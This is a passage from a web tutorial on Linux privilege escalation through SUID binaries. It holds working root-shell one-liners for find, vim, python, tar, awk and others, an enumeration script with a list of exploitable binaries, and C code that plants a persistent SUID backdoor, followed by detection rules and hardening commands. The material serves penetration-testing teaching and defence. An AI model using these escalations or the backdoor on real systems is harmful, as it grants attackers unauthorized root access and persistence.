class="line"><span style="color:#7F848E;font-style:italic"># Find all SUID binaries (suppress permission denied errors)</span></span> <span class="line"><span style="color:#61AFEF">find</span><span style="color:#98C379"> /</span><span style="color:#D19A66"> -perm</span><span style="color:#D19A66"> -u=s</span><span style="color:#D19A66"> -type</span><span style="color:#98C379"> f</span><span style="color:#D19A66"> 2</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">/dev/null</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Limit the search to common binary paths for faster speed</span></span> <span class="line"><span style="color:#61AFEF">find</span><span style="color:#98C379"> /usr/bin</span><span style="color:#98C379"> /sbin</span><span style="color:#98C379"> /opt</span><span style="color:#98C379"> /home</span><span style="color:#D19A66"> -perm</span><span style="color:#D19A66"> -u=s</span><span style="color:#D19A66"> -type</span><span style="color:#98C379"> f</span><span style="color:#D19A66"> 2</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">/dev/null</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Also checks SGID binaries (runs as group owner)</span></span> <span class="line"><span style="color:#61AFEF">find</span><span style="color:#98C379"> /</span><span style="color:#D19A66"> -perm</span><span style="color:#D19A66"> -g=s</span><span style="color:#D19A66"> -type</span><span style="color:#98C379"> f</span><span style="color:#D19A66"> 2</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">/dev/null</span></span></code></pre> <p>A clean system will return a short and predictable list. Look for anything <strong>unusual</strong>—non-standard paths, custom scripts, or development tools.</p> <hr> <h2 id="step-2--cross-referencing-with-gtfobins">Step 2 — Cross-referencing with GTFOBins</h2> <p><a href="https://gtfobins.github.io/">GTFOBins</a> is the definitive reference for Unix binaries that can be abused when given elevated permissions.</p> <h3 id="find">find</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Check if SUID is enabled</span></span> <span class="line"><span style="color:#61AFEF">ls</span><span style="color:#D19A66"> -la</span><span style="color:#ABB2BF"> $(</span><span style="color:#56B6C2">which</span><span style="color:#98C379"> find</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># -rwsr-xr-x 1 root root 204112 ... /usr/bin/find</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Exploit — spawns a root shell</span></span> <span class="line"><span style="color:#61AFEF">find</span><span style="color:#98C379"> .</span><span style="color:#D19A66"> -exec</span><span style="color:#98C379"> /bin/sh</span><span style="color:#D19A66"> -p</span><span style="color:#56B6C2"> \;</span><span style="color:#D19A66"> -quit</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Check escalation</span></span> <span class="line"><span style="color:#61AFEF">whoami</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># root</span></span></code></pre> <p>The <code>-p</code> flag is critical — it tells <code>sh</code> to <strong>preserve the effective UID</strong> instead of discarding it.</p> <h3 id="vim--vi">vim / vi</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Check</span></span> <span class="line"><span style="color:#61AFEF">ls</span><span style="color:#D19A66"> -la</span><span style="color:#ABB2BF"> $(</span><span style="color:#56B6C2">which</span><span style="color:#98C379"> vim</span><span style="color:#ABB2BF">)</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Method 1: via Python3 extension</span></span> <span class="line"><span style="color:#61AFEF">vim</span><span style="color:#D19A66"> -c</span><span style="color:#ABB2BF"> &#x26;#x27;:py3 import os; os.execl(&#x26;quot;/bin/sh&#x26;quot;, &#x26;quot;sh&#x26;quot;, &#x26;quot;-pc&#x26;quot;, &#x26;quot;reset; exec sh -p&#x26;quot;)&#x26;#x27;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Method 2: direct shell spawn</span></span> <span class="line"><span style="color:#61AFEF">vim</span><span style="color:#D19A66"> -c</span><span style="color:#ABB2BF"> &#x26;#x27;:!sh -p&#x26;#x27;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Method 3: via shell escape in normal mode (inside vim)</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># :set shell=/bin/sh</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># :shell</span></span></code></pre> <h3 id="python--python3">python / python3</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">python3</span><span style="color:#D19A66"> -c</span><span style="color:#ABB2BF"> &#x26;#x27;import os; os.execl(&#x26;quot;/bin/sh&#x26;quot;, &#x26;quot;sh&#x26;quot;, &#x26;quot;-p&#x26;quot;)&#x26;#x27;</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Also works in older python2</span></span> <span class="line"><span style="color:#61AFEF">python</span><span style="color:#D19A66"> -c</span><span style="color:#ABB2BF"> &#x26;#x27;import os; os.execl(&#x26;quot;/bin/sh&#x26;quot;, &#x26;quot;sh&#x26;quot;, &#x26;quot;-p&#x26;quot;)&#x26;#x27;</span></span></code></pre> <h3 id="bash">bash</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Only exploitable if SUID is on bash itself (rare, but happens in CTFs)</span></span> <span class="line"><span style="color:#61AFEF">ls</span><span style="color:#D19A66"> -la</span><span style="color:#98C379"> /bin/bash</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># -rwsr-xr-x 1 root root ...</span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">bash</span><span style="color:#D19A66"> -p</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># bash-5.1# whoami</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># root</span></span></code></pre> <h3 id="nmap-legacy-versions--535">nmap (legacy versions &#x3C; 5.35)</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Interactive mode available in older versions of nmap</span></span> <span class="line"><span style="color:#61AFEF">nmap</span><span style="color:#D19A66"> --interactive</span></span> <span class="line"><span style="color:#61AFEF">nmap</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; !</span><span style="color:#61AFEF">sh</span></span></code></pre> <h3 id="tar">tar</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">tar</span><span style="color:#D19A66"> -cf</span><span style="color:#98C379"> /dev/null</span><span style="color:#98C379"> /dev/null</span><span style="color:#D19A66"> --checkpoint=1</span><span style="color:#D19A66"> --checkpoint-action=exec=/bin/sh</span></span></code></pre> <h3 id="perl">perl</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">perl</span><span style="color:#D19A66"> -e</span><span style="color:#ABB2BF"> &#x26;#x27;exec &#x26;quot;/bin/sh&#x26;quot;;&#x26;#x27;</span></span></code></pre> <h3 id="awk">awk</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">awk</span><span style="color:#ABB2BF"> &#x26;#x27;BEGIN {system(&#x26;quot;/bin/sh -p&#x26;quot;)}&#x26;#x27;</span></span></code></pre> <h3 id="less--more">less / more</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Inside the less/more pager</span></span> <span class="line"><span style="color:#61AFEF">less</span><span style="color:#98C379"> /etc/passwd</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Then type:</span></span> <span class="line"><span style="color:#ABB2BF">!</span><span style="color:#61AFEF">/bin/sh</span></span></code></pre> <hr> <h2 id="step-3--automated-enumeration-script">Step 3 — Automated Enumeration Script</h2> <p>The following script cross-references discovered SUID binaries with a list of known exploitable ones and generates prioritized targets.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic">#!/usr/bin/env bash</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># suid_hunter.sh — SUID enumeration and screening</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Usage: ./suid_hunter.sh</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Author: r3d/ops | KBM Security</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">RED</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;#x27;\033[0;31m&#x26;#x27;</span></span> <span class="line"><span style="color:#E06C75">YEL</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;#x27;\033[0;33m&#x26;#x27;</span></span> <span class="line"><span style="color:#E06C75">GRN</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;#x27;\033[0;32m&#x26;#x27;</span></span> <span class="line"><span style="color:#E06C75">BLU</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;#x27;\033[0;34m&#x26;#x27;</span></span> <span class="line"><span style="color:#E06C75">RST</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;#x27;\033[0m&#x26;#x27;</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">KNOWN_EXPLOITABLE</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">nmap</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">vim</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">vi</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">find</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">python</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">python3</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">bash</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">perl</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">ruby</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">tar</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">wget</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">curl</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#E06C75">KNOWN_EXPLOITABLE</span><span style="color:#C678DD">+=</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;|</span><span style="color:#61AFEF">nc</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">netcat</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">awk</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">less</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">more</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">man</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">ftp</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">gdb</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">strace</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">ltrace</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">tclsh</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#E06C75">KNOWN_EXPLOITABLE</span><span style="color:#C678DD">+=</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;|</span><span style="color:#61AFEF">env</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">expect</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">lua</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">php</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">ruby</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">node</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">git</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">zip</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">unzip</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">7z</span><span style="color:#ABB2BF">|</span><span style="color:#61AFEF">aria2c</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#D19A66"> -e</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">BLU</span><span style="color:#ABB2BF">}[*] SUID Binary Hunter — r3d/ops${</span><span style="color:#E06C75">RST</span><span style="color:#ABB2BF">}&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#D19A66"> -e</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;${</span><span style="color:#E06C75">BLU</span><span style="color:#ABB2BF">}[*] Scanning the filesystem...${</span><span style="color:#E06C75">RST</span><span style="color:#ABB2BF">}</span><span style="color:#56B6C2">\n</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">BINS</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$(</span><span style="color:#61AFEF">find</span><span style="color:#98C379"> /</span><span style="color:#D19A66"> -perm</span><span style="color:#D19A66"> -u=s</span><span style="color:#D19A66"> -type</span><span style="color:#98C379"> f</span><span style="color:#D19A66"> 2</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">/dev/null</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#E06C75">TOTAL</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$(</span><span style="color:#56B6C2">echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75">$BINS</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; | </span><span style="color:#61AFEF">wc</span><span style="color:#D19A66"> -l</span><span style="color:#ABB2BF">)</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#D19A66"> -e</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;[*] Found ${</span><span style="color:#E06C75">YEL</span><span style="color:#ABB2BF">}${</span><span style="color:#E06C75">TOTAL</span><span style="color:#ABB2BF">}${</span><span style="color:#E06C75">RST</span><span style="color:#ABB2BF">} SUID binaries</span><span style="color:#56B6C2">\n</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#D19A66"> -e</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;[*] Checking against the list of known exploits...</span><span style="color:#56B6C2">\n</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#E06C75">HIT</span><span style="color:#56B6C2">=</span><span style="color:#98C379">0</span></span> <span class="line"><span style="color:#C678DD">while</span><span style="color:#E06C75"> IFS</span><span style="color:#56B6C2">=</span><span style="color:#56B6C2"> read</span><span style="color:#D19A66"> -r</span><span style="color:#98C379"> bin</span><span style="color:#ABB2BF">; </span><span style="color:#C678DD">do</span></span> <span class="line"><span style="color:#E06C75"> name</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$(</span><span style="color:#61AFEF">basename</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75">$bin</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;)</span></span> <span class="line"><span style="color:#E06C75"> owner</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$(</span><span style="color:#56B6C2">stat</span><span style="color:#D19A66"> -c</span><span style="color:#ABB2BF"> &#x26;#x27;%U&#x26;#x27; &#x26;quot;$bin&#x26;quot; 2&#x26;gt;/dev/null)</span></span> <span class="line"><span style="color:#E06C75"> perms</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$(</span><span style="color:#56B6C2">stat</span><span style="color:#D19A66"> -c</span><span style="color:#ABB2BF"> &#x26;#x27;%A&#x26;#x27; &#x26;quot;$bin&#x26;quot; 2&#x26;gt;/dev/null)</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD"> if</span><span style="color:#56B6C2"> echo</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75">$name</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; | </span><span style="color:#61AFEF">grep</span><span style="color:#D19A66"> -qiE</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75">$KNOWN_EXPLOITABLE</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;; </span><span style="color:#C678DD">then</span></span> <span class="line"><span style="color:#56B6C2"> echo</span><span style="color:#D19A66"> -e</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; ${</span><span style="color:#E06C75">RED</span><span style="color:#ABB2BF">}</span><span style="color:#61AFEF">[!!!]</span><span style="color:#98C379"> EXPLOITABLE:</span><span style="color:#ABB2BF">${</span><span style="color:#E06C75">RST</span><span style="color:#ABB2BF">} </span><span style="color:#E06C75">$bin</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#56B6C2"> echo</span><span style="color:#D19A66"> -e</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">Owner:</span><span style="color:#ABB2BF"> ${</span><span style="color:#E06C75">YEL</span><span style="color:#ABB2BF">}${</span><span style="color:#E06C75">owner</span><span style="color:#ABB2BF">}${</span><span style="color:#E06C75">RST</span><span style="color:#ABB2BF">} | </span><span style="color:#61AFEF">Perm:</span><span style="color:#ABB2BF"> ${</span><span style="color:#E06C75">perms</span><span style="color:#ABB2BF">}&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#56B6C2"> echo</span><span style="color:#D19A66"> -e</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">GTFOBins:</span><span style="color:#ABB2BF"> ${</span><span style="color:#E06C75">BLU</span><span style="color:#ABB2BF">}</span><span style="color:#98C379">https://gtfobins.github.io/gtfobins/</span><span style="color:#ABB2BF">${</span><span style="color:#E06C75">name</span><span style="color:#ABB2BF">}</span><span style="color:#98C379">/#suid</span><span style="color:#ABB2BF">${</span><span style="color:#E06C75">RST</span><span style="color:#ABB2BF">}</span><span style="color:#56B6C2">\n</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#E06C75"> HIT</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">$((</span><span style="color:#61AFEF">HIT</span><span style="color:#98C379"> +</span><span style="color:#D19A66"> 1</span><span style="color:#ABB2BF">))</span></span> <span class="line"><span style="color:#C678DD"> else</span></span> <span class="line"><span style="color:#56B6C2"> echo</span><span style="color:#D19A66"> -e</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; ${</span><span style="color:#E06C75">GREEN</span><span style="color:#ABB2BF">}</span><span style="color:#61AFEF">[ok]$</span><span style="color:#98C379">{RST}</span><span style="color:#E06C75"> $bin</span><span style="color:#ABB2BF"> ${</span><span style="color:#E06C75">BLUE</span><span style="color:#ABB2BF">}(${</span><span style="color:#E06C75">owner</span><span style="color:#ABB2BF">})${</span><span style="color:#E06C75">RST</span><span style="color:#ABB2BF">}&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#C678DD"> fi</span></span> <span class="line"><span style="color:#C678DD">done</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">lt</span><span style="color:#ABB2BF">;&#x26;</span><span style="color:#61AFEF">lt</span><span style="color:#ABB2BF">;&#x26;</span><span style="color:#61AFEF">lt</span><span style="color:#ABB2BF">; &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75">$BINS</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2">echo</span><span style="color:#D19A66"> -e</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">\n[*]</span><span style="color:#98C379"> Summary:</span><span style="color:#ABB2BF"> ${</span><span style="color:#E06C75">RED</span><span style="color:#ABB2BF">}${</span><span style="color:#E06C75">HIT</span><span style="color:#ABB2BF">} </span><span style="color:#98C379">potential</span><span style="color:#98C379"> target</span><span style="color:#ABB2BF">(</span><span style="color:#61AFEF">s</span><span style="color:#ABB2BF">)${</span><span style="color:#E06C75">RST</span><span style="color:#ABB2BF">} </span><span style="color:#98C379">out</span><span style="color:#98C379"> of</span><span style="color:#ABB2BF"> ${</span><span style="color:#E06C75">TOTAL</span><span style="color:#ABB2BF">} </span><span style="color:#98C379">SUID</span><span style="color:#98C379"> binaries</span><span style="color:#98C379"> in</span><span style="color:#98C379"> total</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span></span></code></pre> <hr> <h2 id="step-4--writing-a-custom-suid-backdoor-lab-scenario">Step 4 — Writing a Custom SUID Backdoor (Lab Scenario)</h2> <p>In authorized red team operations, you may need to plant a persistent SUID shell for post-exploitation access.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># As root — compile a minimal setuid wrapper for the shell</span></span> <span class="line"><span style="color:#61AFEF">cat</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">/tmp/rootshell.c</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">lt</span><span style="color:#ABB2BF">;&#x26;</span><span style="color:#61AFEF">lt</span><span style="color:#ABB2BF">; &#x26;#x27;EOF&#x26;#x27;</span></span> <span class="line"><span style="color:#7F848E;font-style:italic">#include </span></span> <span class="line"><span style="color:#ABB2BF">&#x3C;stdio.h>#include&#x3C;unistd.h></span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">int</span><span style="color:#98C379"> main</span><span style="color:#ABB2BF">() </span><span style="color:#98C379">{</span></span> <span class="line"><span style="color:#61AFEF"> setuid(0</span><span style="color:#ABB2BF">);</span></span> <span class="line"><span style="color:#61AFEF"> setgid(0</span><span style="color:#ABB2BF">);</span></span> <span class="line"><span style="color:#61AFEF"> execl(</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">/bin/bash</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">,</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">bash</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">,</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">-p</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">,</span><span style="color:#98C379"> NULL</span><span style="color:#ABB2BF">);</span></span> <span class="line"><span style="color:#C678DD"> return</span><span style="color:#D19A66"> 0</span><span style="color:#ABB2BF">;</span></span> <span class="line"><span style="color:#ABB2BF">}</span></span> <span class="line"><span style="color:#61AFEF">EOF</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Compile and set SUID</span></span> <span class="line"><span style="color:#61AFEF">gcc</span><span style="color:#98C379"> /tmp/rootshell.c</span><span style="color:#D19A66"> -o</span><span style="color:#98C379"> /tmp/rootshell</span></span> <span class="line"><span style="color:#61AFEF">chmod</span><span style="color:#98C379"> u+s</span><span style="color:#98C379"> /tmp/rootshell</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># A low-privileged user can now call it</span></span> <span class="line"><span style="color:#61AFEF">/tmp/rootshell</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># bash-5.1# whoami</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># root</span></span></code></pre> <p>> <strong>DANGER:</strong> Never deploy SUID backdoors on production systems or without explicit written authorization. This is only for authorized lab environments.</p> <hr> <h2 id="detection--mitigation">Detection &#x26; Mitigation</h2> <h3 id="blue-team-detections">Blue Team Detections</h3> <table><thead><tr><th>Indicator</th><th>Data Source</th><th>Rule Logic</th></tr></thead><tbody><tr><td>New SUID binary created</td><td>auditd / inotify</td><td><code>find / -newer /tmp -perm -4000</code></td></tr><tr><td>SUID binary executes shell</td><td>auditd execve</td><td>parent=suid_binary, child=/bin/sh</td></tr><tr><td>Unexpected SUID owner</td><td>file integrity</td><td>owner=root AND path NOT IN baseline</td></tr><tr><td><code>-p</code> flag passed to shell</td><td>process args</td><td><code>sh -p</code> OR <code>bash -p</code> in cmdline</td></tr></tbody></table> <h3 id="hardening-commands">Hardening Commands</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Audit all SUID binaries — save a baseline</span></span> <span class="line"><span style="color:#61AFEF">find</span><span style="color:#98C379"> /</span><span style="color:#D19A66"> -perm</span><span style="color:#D19A66"> -4000</span><span style="color:#D19A66"> -type</span><span style="color:#98C379"> f</span><span style="color:#D19A66"> 2</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">/dev/null</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">/root/suid_baseline.txt</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Remove SUID from a specific binary</span></span> <span class="line"><span style="color:#61AFEF">chmod</span><span style="color:#98C379"> u-s</span><span style="color:#98C379"> /path/to/binary</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Mount partitions with nosuid to prevent SUID on those filesystems</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># In /etc/fstab:</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># /dev/sdb1 /data ext4 defaults,nosuid,noexec 0 0</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># AppArmor profile enforcement</span></span> <span class="line"><span style="color:#61AFEF">aa-enforce</span><span style="color:#98C379"> /usr/bin/find</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Verify binary integrity against the package manager</span></span> <span class="line"><span style="color:#61AFEF">dpkg</span><span style="color:#D19A66"> --verify</span><span style="color:#7F848E;font-style:italic"> # Debian/Ubuntu</span></span> <span class="line"><span style="color:#61AFEF">rpm</span><span 